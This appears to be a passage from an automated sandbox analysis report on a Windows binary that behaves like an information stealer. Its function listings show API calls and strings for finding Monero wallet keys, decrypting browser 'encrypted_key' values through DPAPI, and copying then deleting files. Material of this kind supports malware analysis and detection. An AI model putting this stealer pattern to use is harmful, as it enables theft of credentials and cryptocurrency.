                          • Opcode Fuzzy Hash: aa03cc755037dccd757166d8fa3d9e19ed8bf44579631f2dd77b28059a0d9ca9
                          • Instruction Fuzzy Hash: B82130B1A40208AFDB04DF95DD49FBEBBB8FB48711F144169F609BB280C7799904CBA1
                          Function 00CC8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00CC951E,00000000), ref: 00CC8D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC8D62
                          • wsprintfW.USER32 ref: 00CC8D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: 1b8153cb68fadb94796e740cf88f58d040b5d48446fe0f5cc3c504041e4d570c
                          • Instruction ID: 81e292ebef84ab07692dad2ee6a69fd93cd398c769dd2db9e5b07685076de0ed
                          • Opcode Fuzzy Hash: 1b8153cb68fadb94796e740cf88f58d040b5d48446fe0f5cc3c504041e4d570c
                          • Instruction Fuzzy Hash: 41E086B1A40208BFC704DB95DC0EE6977B8EB44701F040065FD0D9B280D9715E04DB52
                          Function 00CBA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CC8B60: GetSystemTime.KERNEL32(00CD0E1A,018992C8,00CD05AE,?,?,00CB13F9,?,0000001A,00CD0E1A,00000000,?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CC8B86
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CBA2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 00CBA3FF
                          • lstrlen.KERNEL32(00000000), ref: 00CBA6BC
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 00CBA743
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 7727c85c1e25c4d6135c743dcaa6d04dd6b67b87e9a045bd797935c0410a1c6b
                          • Instruction ID: 668bd65c96fff11366d87111b82574ce73a03e0bb4cf8c06ff12d5c1e49caf96
                          • Opcode Fuzzy Hash: 7727c85c1e25c4d6135c743dcaa6d04dd6b67b87e9a045bd797935c0410a1c6b
                          • Instruction Fuzzy Hash: D5E10B7281010C9BCB14EBA5DC9AFEE7338AF54304F54816DF516B6091EE306A4EEB66
                          Function 00CBD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CC8B60: GetSystemTime.KERNEL32(00CD0E1A,018992C8,00CD05AE,?,?,00CB13F9,?,0000001A,00CD0E1A,00000000,?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CC8B86
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CBD481
                          • lstrlen.KERNEL32(00000000), ref: 00CBD698
                          • lstrlen.KERNEL32(00000000), ref: 00CBD6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 00CBD72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 410c0f6c6be15471002c56c1cefa34e59f81ddecfaf1012e4e63aaeccc81981f
                          • Instruction ID: 648d40d47e02ff2089aff392902ef1860e784cac36c33d3ed9c0abf3e34bbc24
                          • Opcode Fuzzy Hash: 410c0f6c6be15471002c56c1cefa34e59f81ddecfaf1012e4e63aaeccc81981f
                          • Instruction Fuzzy Hash: 0A91F97291010C9BCB04FBA5DC9AFEE7338AF54308F54416DF516B6091EF346A4AEB62
                          Function 00CBD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CC8B60: GetSystemTime.KERNEL32(00CD0E1A,018992C8,00CD05AE,?,?,00CB13F9,?,0000001A,00CD0E1A,00000000,?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CC8B86
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CBD801
                          • lstrlen.KERNEL32(00000000), ref: 00CBD99F
                          • lstrlen.KERNEL32(00000000), ref: 00CBD9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 00CBDA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 2d99c5c9347fe8ee309274d5956df1db97cdf1388bf6d5a762e65b9ee0a0c62a
                          • Instruction ID: 3f941bf998959f69fd295c97e0072df77d35b2694236cfcb81085b556624736e
                          • Opcode Fuzzy Hash: 2d99c5c9347fe8ee309274d5956df1db97cdf1388bf6d5a762e65b9ee0a0c62a
                          • Instruction Fuzzy Hash: C981EB7291010C9BDB04FBA5DC9AFEE7338AF54304F54416DF507B6091EE346A0AEBA2
                          Function 00CBF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB99EC
                            • Part of subcall function 00CB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CB9A11
                            • Part of subcall function 00CB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CB9A31
                            • Part of subcall function 00CB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CB148F,00000000), ref: 00CB9A5A
                            • Part of subcall function 00CB99C0: LocalFree.KERNEL32(00CB148F), ref: 00CB9A90
                            • Part of subcall function 00CB99C0: CloseHandle.KERNEL32(000000FF), ref: 00CB9A9A
                            • Part of subcall function 00CC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CC8E52
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00CD1580,00CD0D92), ref: 00CBF54C
                          • lstrlen.KERNEL32(00000000), ref: 00CBF56B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          • Opcode ID: 1b35348d7b9a6d0965fcaed971f72a2f0c289343135f27effeacb68dd9e26991
                          • Instruction ID: 01df93079552fff8f9177fb685dacff90bec5016681f262edfc2396892491e0b
                          • Opcode Fuzzy Hash: 1b35348d7b9a6d0965fcaed971f72a2f0c289343135f27effeacb68dd9e26991
                          • Instruction Fuzzy Hash: 17510171D1010CABDB04FBA4EC5AFED7378AF54304F40852DF916A7191EE346A0ADBA2
                          Function 00CC3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: fa74a1c019c7a3bda59a607af53a969066d97920c6d79f3886b83d1bfa93dff2
                          • Instruction ID: 1b3b5c5ed2888c88cb52aaf226834de32886563e6f332e87f3c684eb8ae1a93d
                          • Opcode Fuzzy Hash: fa74a1c019c7a3bda59a607af53a969066d97920c6d79f3886b83d1bfa93dff2
                          • Instruction Fuzzy Hash: 76413EB1D10149AFCB04EFA5D849FEEB774BB44704F10842CF51676291EB74AA09DFA2
                          Function 00CB9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB99EC
                            • Part of subcall function 00CB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CB9A11
                            • Part of subcall function 00CB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CB9A31
                            • Part of subcall function 00CB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CB148F,00000000), ref: 00CB9A5A
                            • Part of subcall function 00CB99C0: LocalFree.KERNEL32(00CB148F), ref: 00CB9A90
                            • Part of subcall function 00CB99C0: CloseHandle.KERNEL32(000000FF), ref: 00CB9A9A
                            • Part of subcall function 00CC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CC8E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00CB9D39
                            • Part of subcall function 00CB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CB4EEE,00000000,00000000), ref: 00CB9AEF
                            • Part of subcall function 00CB9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00CB4EEE,00000000,?), ref: 00CB9B01
                            • Part of subcall function 00CB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CB4EEE,00000000,00000000), ref: 00CB9B2A
                            • Part of subcall function 00CB9AC0: LocalFree.KERNEL32(?,?,?,?,00CB4EEE,00000000,?), ref: 00CB9B3F
                            • Part of subcall function 00CB9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00CB9B84
                            • Part of subcall function 00CB9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00CB9BA3
                            • Part of subcall function 00CB9B60: LocalFree.KERNEL32(?), ref: 00CB9BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: 7878afa374b362876325b3fc6f2c2f33a99ea9001b91823f77fabb435f03e76d
                          • Instruction ID: 2b373ee78b7ed1444383b0e6e7329234d32e8c7724c743598ec39aa76662acfb
                          • Opcode Fuzzy Hash: 7878afa374b362876325b3fc6f2c2f33a99ea9001b91823f77fabb435f03e76d
                          • Instruction Fuzzy Hash: 06311CB6D10209ABDF14DFE5DC85EEFB7B8FB48304F144529EA15A7241EB319A04CBA1
                          Function 00CC92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00CC3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00CC3AEE,?), ref: 00CC92FC
                          • GetFileSizeEx.KERNEL32(000000FF,00CC3AEE), ref: 00CC9319
                          • CloseHandle.KERNEL32(000000FF), ref: 00CC9327
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID:
                          • API String ID: 1378416451-0
                          • Opcode ID: df8a27be4ecd8974212c5082fadd8a62f58777e3f47aceb26dfbf4a65d76192e
                          • Instruction ID: a41f0a5eea925a2fed447b0d6422c4ae6651246b64f0908b83b58365442a3f1c
                          • Opcode Fuzzy Hash: df8a27be4ecd8974212c5082fadd8a62f58777e3f47aceb26dfbf4a65d76192e
                          • Instruction Fuzzy Hash: DDF01975E40208ABDB10DBA2DC49FAE77B9EB88710F148668E655AB2D0D6B0A6058F40
                          Function 00CCC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 00CCC74E
                            • Part of subcall function 00CCBF9F: __amsg_exit.LIBCMT ref: 00CCBFAF
                          • __getptd.LIBCMT ref: 00CCC765
                          • __amsg_exit.LIBCMT ref: 00CCC773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00CCC797
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
